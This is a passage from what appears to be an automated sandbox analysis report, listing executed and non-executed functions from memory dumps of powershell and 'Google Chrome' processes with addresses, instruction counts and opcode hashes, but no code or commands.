                                                    • Instruction Fuzzy Hash: 0721F231A0CA4C8FDB58DF9CD88A7E97BE0EB95321F04812FD14DC3112DA74984ACB91
                                                    Function 00007FFD349743BC Relevance: .1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2631203965.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd34970000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ba7feb0b3342f0a1b5a8bc7c97eb8b58327ddad3283a85b2bca895b93f17c97a
                                                    • Instruction ID: 426074deee7ed5e4ed0dc3fa029990a9f8628a5020bcbcffa8f65bdfd11ea9aa
                                                    • Opcode Fuzzy Hash: ba7feb0b3342f0a1b5a8bc7c97eb8b58327ddad3283a85b2bca895b93f17c97a
                                                    • Instruction Fuzzy Hash: 3C11E332F4E5858FE7A4E6184CF05B47ED1EF46224B4940BED68DD719BD91DBC04A360
                                                    Function 00007FFD348A33B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2629416770.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction ID: 0c5e5649d06d92c1145b5404b9a75156bb07d5da2bacdf6660bb961c601e6699
                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction Fuzzy Hash: 5C01677121CB0D4FD744EF4CE451AA6B7E0FB99364F10056DE58AC3651DA36E882CB45
                                                    Function 00007FFD348AA0FB Relevance: .0, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2629416770.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ab7a057d28626751af3e611c5249da002f5224f549068cf6dda0fafb3cda2adf
                                                    • Instruction ID: 3b97d3c740ccec72f4285f9f47f414f082d2d64947a8a2a0142c4e5c33d06677
                                                    • Opcode Fuzzy Hash: ab7a057d28626751af3e611c5249da002f5224f549068cf6dda0fafb3cda2adf
                                                    • Instruction Fuzzy Hash: 91F0FC76609ACC4FDB81DF2CAC690E9BFE0FF67215B0502ABD509C7061DB654804C7C1

                                                    Non-executed Functions

                                                    Function 00007FFD348A8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.2629416770.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffd348a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                    • API String ID: 0-962139525
                                                    • Opcode ID: 64d54649c1b082f21b48bcec0ea01dd949fe03042b20aeedb8b22134a012397b
                                                    • Instruction ID: 0d89409c9456d6fc60ab0403801a8cf6c960bb07274d0b8a9fee97d209a9d1ca
                                                    • Opcode Fuzzy Hash: 64d54649c1b082f21b48bcec0ea01dd949fe03042b20aeedb8b22134a012397b
                                                    • Instruction Fuzzy Hash: 5921F273B045259AC21236FCB8619D97794DF5437838A03F3E028DF193F978B48B8A80

                                                    Executed Functions

                                                    Function 00007FFD348B0EFA Relevance: 3.4, Strings: 2, Instructions: 854COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2708303382.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4M_^$5M_^
                                                    • API String ID: 0-4266852409
                                                    • Opcode ID: 72f550ab738993be8d4789ba7f38c45eccb4ac5daa60c15d4b208c89af890239
                                                    • Instruction ID: ea89d56cd1de8d4ca2d7b77cf6faa2d9567aa30475d2408f1ec1fee5746ca2de
                                                    • Opcode Fuzzy Hash: 72f550ab738993be8d4789ba7f38c45eccb4ac5daa60c15d4b208c89af890239
                                                    • Instruction Fuzzy Hash: CDC1E323B0D5A65FE711B7FCA8B10EA7B64EF42364B0C42B7D189DB093ED6C74468291
                                                    Function 00007FFD348B1DCA Relevance: .2, Instructions: 188COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2708303382.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e582f74a5d2993d2ca2778832eb7b5d4f74edb4fd6902b654fdf22e5796e5e0c
                                                    • Instruction ID: bd6017b2659d3f9b488e948c962fb891d408bb4f2dd5e9e7798a71072bfd3b34
                                                    • Opcode Fuzzy Hash: e582f74a5d2993d2ca2778832eb7b5d4f74edb4fd6902b654fdf22e5796e5e0c
                                                    • Instruction Fuzzy Hash: B751C31170EAC50FE79697B898692657FD2DF9B210B0901FFE08DCB2A7CD599C06C352
                                                    Function 00007FFD348B1669 Relevance: .6, Instructions: 591COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2708303382.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e35a8b78f286fe7f9ac8b30ac5e72b6caf339c34cc7c3dd343eb08ca08579af5
                                                    • Instruction ID: eef5d43216a56815a867db0fb1fed9bd5e9f05a7048f0e28153f2826c8f4123d
                                                    • Opcode Fuzzy Hash: e35a8b78f286fe7f9ac8b30ac5e72b6caf339c34cc7c3dd343eb08ca08579af5
                                                    • Instruction Fuzzy Hash: 1812B421B189094FE7A8E7A884B96B977D2FF99350F5405B9E10ED72D3DD6CA8018380
                                                    Function 00007FFD348B1165 Relevance: .6, Instructions: 589COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2708303382.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 73bc506d78066b99b85d113dddff1daae123de3c755e1af8e60b876175ad35e9
                                                    • Instruction ID: 4f447975b68fed2dfe7981a3bf71eaaed46feebbf413ade81551eaeafefac02f
                                                    • Opcode Fuzzy Hash: 73bc506d78066b99b85d113dddff1daae123de3c755e1af8e60b876175ad35e9
                                                    • Instruction Fuzzy Hash: 56418222A0D69A4FD752A7B898B11EA7BB0EF43354B0801F7C18ADF1D3DD6C68069391
                                                    Function 00007FFD348B16A9 Relevance: .5, Instructions: 491COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2708303382.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f86421b96c5bc2aa7f795adde11507089b2ea3e1a0c6a127b89bf9fd4306dbf0
                                                    • Instruction ID: a246a40e714dab486c2b6411a9bcdc41545b985f1f1c2c4aadef322a6f815116
                                                    • Opcode Fuzzy Hash: f86421b96c5bc2aa7f795adde11507089b2ea3e1a0c6a127b89bf9fd4306dbf0
                                                    • Instruction Fuzzy Hash: CEF1A461F189494FE7A8E76884B96B977D2FF9A340F4405B9D10ED72D3DE6CAC018780
                                                    Function 00007FFD348B0C61 Relevance: .2, Instructions: 212COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2708303382.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 63a49fc73b5f4b4a8ae3c659d8fa012facbd42baade2ccf42f0917a991b80372
                                                    • Instruction ID: d0814dcb61a5a54bf623e8e20fd78fcdde37c871a6acbdd642628486f261ed30
                                                    • Opcode Fuzzy Hash: 63a49fc73b5f4b4a8ae3c659d8fa012facbd42baade2ccf42f0917a991b80372
                                                    • Instruction Fuzzy Hash: 7C510B22B0D6860FE366A77C58762B97BD1EF97321B1C41BED488C71E3DD5DA8428381
                                                    Function 00007FFD348B0570 Relevance: .1, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2708303382.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f6c7e2b4d323e04bb0a24aa056cfbcf80c652702c5c64e175c56d1c2dd0ebd2
                                                    • Instruction ID: ba24ed74593ad9d93218079fc091a74a0cc97429063b4f77560b9e518d573099
                                                    • Opcode Fuzzy Hash: 4f6c7e2b4d323e04bb0a24aa056cfbcf80c652702c5c64e175c56d1c2dd0ebd2
                                                    • Instruction Fuzzy Hash: 9C31D821B1C9494FE798EB6C98AA379B6C2EBD9355F0401BEE04EC7397DD68AC018341
                                                    Function 00007FFD348B0AB9 Relevance: .1, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2708303382.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 95bc5c2c724ad8f4223fe211adb5615e31d1b42bb226890b21a8c57ac4868f4e
                                                    • Instruction ID: 73c903b3d4a94c5b6410eb397eaa714cae9470ca30dac7183550d13eb5cabb0b
                                                    • Opcode Fuzzy Hash: 95bc5c2c724ad8f4223fe211adb5615e31d1b42bb226890b21a8c57ac4868f4e
                                                    • Instruction Fuzzy Hash: 78319521B1C9494FE754ABAC486A3BD77D5EF9A301F14417AE40CC3292DE6CA8418791
                                                    Function 00007FFD348B0975 Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2708303382.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8dcf23e5b5c9bb798a049a9546cb2e096bdcb94f6eec4fa6f51827c6042b45ea
                                                    • Instruction ID: ba8906cb90a12145b97aa7cd4802988a17fb16eb3265e0baa26e5f786e7ead48
                                                    • Opcode Fuzzy Hash: 8dcf23e5b5c9bb798a049a9546cb2e096bdcb94f6eec4fa6f51827c6042b45ea
                                                    • Instruction Fuzzy Hash: 02319035F18A0E4FEB55EBA8C8B52ED77E1FF99311F540679D109E3282CE38A8418780
                                                    Function 00007FFD348B0845 Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2708303382.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c836a70e9380e0d7e2d0252158e13c638426c0676747b144103d590898144c87
                                                    • Instruction ID: bba2aa648480f9a0a6b42bb256c3fad59b70845206ac62d8474398f1fb2303da
                                                    • Opcode Fuzzy Hash: c836a70e9380e0d7e2d0252158e13c638426c0676747b144103d590898144c87
                                                    • Instruction Fuzzy Hash: CF31F426B4DA894FD351DBA898B51A97FE1FF96200B4441EAD54CD7397CE34F90087C1
                                                    Function 00007FFD348B0807 Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2708303382.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c8a4ab54dcadd115d1c657fc33d108f1764a3c10db58b2c5d04979ea22de2221
                                                    • Instruction ID: 11d6fb7fa6a9a8783759b3940f5b4ce91bda4024ce3825ab62c020eea2beb31f
                                                    • Opcode Fuzzy Hash: c8a4ab54dcadd115d1c657fc33d108f1764a3c10db58b2c5d04979ea22de2221
                                                    • Instruction Fuzzy Hash: 3421E535B5890D8FD754EBA880B94A97FE1FF99300F8446A8D60DE3386DE38F9008781
                                                    Function 00007FFD348B1F71 Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2708303382.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ce927760ae911d3df252983a123be7eea9e769f69fa2f46ec75a661886c80b2
                                                    • Instruction ID: cd751296c4fe9dcee78cd3d4cd99c856a81364258095975bfceaa01363bc4824
                                                    • Opcode Fuzzy Hash: 3ce927760ae911d3df252983a123be7eea9e769f69fa2f46ec75a661886c80b2
                                                    • Instruction Fuzzy Hash: F7012B55E0D7808FE741A73858B54717FE09F97340B0804ABE889CA1A7DE58A944D3C3

                                                    Executed Functions

                                                    Function 00007FFD34890EFA Relevance: 3.4, Strings: 2, Instructions: 853COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2814062460.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4O_^$5O_^
                                                    • API String ID: 0-3220362026
                                                    • Opcode ID: 6eb7877196a162be19790a7b3826460b389fcd707607e2ed827fd12960526721
                                                    • Instruction ID: e7a5fc0adfbaa60e7ca85dfba7d7d44b5695a09f476df23d09e39c8c0eecd6e5
                                                    • Opcode Fuzzy Hash: 6eb7877196a162be19790a7b3826460b389fcd707607e2ed827fd12960526721
                                                    • Instruction Fuzzy Hash: CEC1D527B0D5621BE711B7FCA4B11EA3B64DF82325B0C51B7D28DDF193ED28744A8294
                                                    Function 00007FFD34891DCA Relevance: .2, Instructions: 188COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2814062460.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: de0e224d9b2d0be3359beb50eb2796454ae2b8b60469a346549f0b07a2bea26f
                                                    • Instruction ID: c87858c26bd1edaefae20fcfe30339a73f7d064774e94aa4ec1ba2c2a057e50d
                                                    • Opcode Fuzzy Hash: de0e224d9b2d0be3359beb50eb2796454ae2b8b60469a346549f0b07a2bea26f
                                                    • Instruction Fuzzy Hash: 9151C31170DAC60FE796A7B898692A57FD2DF8B210B0901FFE08DCB2A7CD595C46C312
                                                    Function 00007FFD34891669 Relevance: .7, Instructions: 664COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2814062460.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c66e496c6cec4b96726150cc547814278381642a5a08dcd5aebce152aafad86
                                                    • Instruction ID: 77a87e00b5031945f0c96a3e44cb9f7f8479868679602524fba874b72048716c
                                                    • Opcode Fuzzy Hash: 7c66e496c6cec4b96726150cc547814278381642a5a08dcd5aebce152aafad86
                                                    • Instruction Fuzzy Hash: 8922B571B189094FEB98F7A894B96B97BD2FF99310F44057AE40ED32D2DE39AC418740
                                                    Function 00007FFD34891165 Relevance: .6, Instructions: 589COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2814062460.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 72cc43615062ed3238e240ebb9de24f0b7492bde5570c61031bdf8b18533d651
                                                    • Instruction ID: eca2e15fd2d3f257c8765fe3b3fe36f83b36444336f110798cc29f57ecbac93c
                                                    • Opcode Fuzzy Hash: 72cc43615062ed3238e240ebb9de24f0b7492bde5570c61031bdf8b18533d651
                                                    • Instruction Fuzzy Hash: 08419522A0D6965FEB52A7B898B21EA7FB0EF42314B0800B7C189DB1D3DD2C68068351
                                                    Function 00007FFD348916A9 Relevance: .5, Instructions: 491COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2814062460.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a25caeadc37912e881e8c3508805bd41960b78b9990062c352041f5d48b174d
                                                    • Instruction ID: 30576b15d4b4c3c3811acc2cc4026d28bb73856cf4ae7fa2d7f7c87335ce1985
                                                    • Opcode Fuzzy Hash: 2a25caeadc37912e881e8c3508805bd41960b78b9990062c352041f5d48b174d
                                                    • Instruction Fuzzy Hash: ADF18361B1891A4FEBA8E76884796B967D2FF99300F84057AD40ED32D7DE3CAC419740
                                                    Function 00007FFD34890C61 Relevance: .2, Instructions: 170COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2814062460.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3b34b4700a716ad93da9455bf0c959bf0bd65cd08b2817b900460c505528a72
                                                    • Instruction ID: f3b37bffe853bf60eb4fafea3d143c450e849dfe72f992e19fa6b0d3792125c6
                                                    • Opcode Fuzzy Hash: e3b34b4700a716ad93da9455bf0c959bf0bd65cd08b2817b900460c505528a72
                                                    • Instruction Fuzzy Hash: 2D51F821B0EA864FF366A77858662797BD1EF87310B0845BAD48DC72D7DD5CAC428341
                                                    Function 00007FFD34890570 Relevance: .1, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2814062460.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 413b662ce9b38e7e23eac3ca10bfa8cc39cbdf0315c1d5670905b37d48b0a4a8
                                                    • Instruction ID: 225485ca10af2b3c7ad559ca0b6baaad0fe2a6c7f0600daadd2da2e57eaeb368
                                                    • Opcode Fuzzy Hash: 413b662ce9b38e7e23eac3ca10bfa8cc39cbdf0315c1d5670905b37d48b0a4a8
                                                    • Instruction Fuzzy Hash: E431C321B1C9494FF798EB6C94AA379B6C2EBD9315F0405BEE04EC33A7DD68AC418341
                                                    Function 00007FFD34890AB9 Relevance: .1, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2814062460.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9980e24ea02080bc158faf30201898e1d087d6d3fd87004f2a3d9153791b5ac5
                                                    • Instruction ID: d3e4466372ca60d2243eaa5e8c1498762b9ed87e8eb729b7297c6456cea5db10
                                                    • Opcode Fuzzy Hash: 9980e24ea02080bc158faf30201898e1d087d6d3fd87004f2a3d9153791b5ac5
                                                    • Instruction Fuzzy Hash: 21318561B18A4A4FE754ABBC486A3BD77D5EF9A311F14417AE00DC32D3DE2CA8418791
                                                    Function 00007FFD34890975 Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2814062460.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 522677238e43fb54a5c5f109b9e1684164d63d4e1e48e590da70181ec3a30adc
                                                    • Instruction ID: 858aab87a8a24f60774fecf84c2c8766d8fc4392baf5f360c5628db215edbb21
                                                    • Opcode Fuzzy Hash: 522677238e43fb54a5c5f109b9e1684164d63d4e1e48e590da70181ec3a30adc
                                                    • Instruction Fuzzy Hash: 6B31A475B18A094FEB54FBA8D4752ED7BB1FF89311F94457AD109D3282DE386881C780
                                                    Function 00007FFD34890845 Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2814062460.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eb5675c8a474b40bd9cd930484087da95f012bae90453a4cc29c17637103937d
                                                    • Instruction ID: 45b51e2776f6419b34860dc0da7fa961e0b47336e560e80342f73e71039e5bce
                                                    • Opcode Fuzzy Hash: eb5675c8a474b40bd9cd930484087da95f012bae90453a4cc29c17637103937d
                                                    • Instruction Fuzzy Hash: 5E31F635B4D6894FDB59EBA848B61A97FA1FF8620078484BBD40CD7397DE34AC40C781
                                                    Function 00007FFD34890807 Relevance: .1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2814062460.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6ec83f424fcda42593528529d335692a9514fde1eefdf13bee9d81e8def752a6
                                                    • Instruction ID: f32559c6e2ec364e81632d489b4ad8b5bfc7a47f26bc40658d204361d709691e
                                                    • Opcode Fuzzy Hash: 6ec83f424fcda42593528529d335692a9514fde1eefdf13bee9d81e8def752a6
                                                    • Instruction Fuzzy Hash: E121D135B5864A4FDB58FBA880BA4A97FA1FF89300BC49567D40DD3387DE38A941C781
                                                    Function 00007FFD34891F71 Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2814062460.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd34890000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00b2624a48cf8525d21dcc46ce2e6ad11b81718db7e9f5246d20ef289f67a95f
                                                    • Instruction ID: 98391e814fc61855774308ef7f47d66640f8b505280bcbb5abfdcd254c4e7a18
                                                    • Opcode Fuzzy Hash: 00b2624a48cf8525d21dcc46ce2e6ad11b81718db7e9f5246d20ef289f67a95f
                                                    • Instruction Fuzzy Hash: F0012655E0DBD44FF742AB3858B54727FE09F92300B0804EBEC89C61E7EA18A9409383

                                                    Executed Functions

                                                    Function 00007FFD348B0EFA Relevance: 3.4, Strings: 2, Instructions: 854COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2818494624.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4M_^$5M_^
                                                    • API String ID: 0-4266852409
                                                    • Opcode ID: 53270b4b37d7d0c9ff46cdddb36fd0a46ea809d3ed041fd6b95f4c79803422ef
                                                    • Instruction ID: 2b679f692b292a55b42f2f62659b25f761b3c681ee0da9e609fab5b676ce5b9f
                                                    • Opcode Fuzzy Hash: 53270b4b37d7d0c9ff46cdddb36fd0a46ea809d3ed041fd6b95f4c79803422ef
                                                    • Instruction Fuzzy Hash: 28C1E323B0D5A65FE711B7FCA8B10EA7B64EF42364B0C42B7D189DB093ED6C74468291
                                                    Function 00007FFD348B1DCA Relevance: .2, Instructions: 188COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2818494624.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 570273a6a2e420ecc4331f0b26a03d79dc63d50a0822a3fc7fa256e08277a7f5
                                                    • Instruction ID: f10cc7a402c6a074aefaf3a38b76cb56aba006ab37161c95bb4963d7ce7a6822
                                                    • Opcode Fuzzy Hash: 570273a6a2e420ecc4331f0b26a03d79dc63d50a0822a3fc7fa256e08277a7f5
                                                    • Instruction Fuzzy Hash: 4751C31170EAC50FE7969BB898692657FD2DF8B210B0901FFE08DCB2A7CD595C06C352
                                                    Function 00007FFD348B1669 Relevance: .6, Instructions: 591COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2818494624.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd348b0000_Google Chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
